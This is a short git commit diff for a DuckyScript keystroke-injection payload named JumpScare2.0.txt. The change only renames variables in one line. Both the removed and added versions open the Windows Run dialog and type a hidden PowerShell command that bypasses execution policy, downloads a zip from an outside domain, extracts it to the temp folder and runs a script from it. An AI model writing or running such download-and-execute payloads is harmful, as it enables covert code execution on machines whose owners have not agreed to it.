Update JumpScare2.0.txt
This commit is contained in:
parent
44af1ef445
commit
d013c61eaa
1 changed files with 1 additions and 1 deletions
|
@ -10,5 +10,5 @@ REM -------------------------------------------------------------------------
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/kiv' -O "$D\js.zip";Expand-Archive "$D\js.zip" -Des $D -Force;. "$D\js\js.ps1"
|
STRING powershell -w h -NoP -NonI -Ep Bypass $downloadDirectory = "$env:tmp";iwr -Uri 'https://jakoby.lol/kiv' -OutFile "$downloadDirectory\js.zip";Expand-Archive "$downloadDirectory\js.zip" -DestinationPath $downloadDirectory -Force;. "$downloadDirectory\js\js.ps1"
|
||||||
ENTER
|
ENTER
|
||||||
|
|
Loading…
Reference in a new issue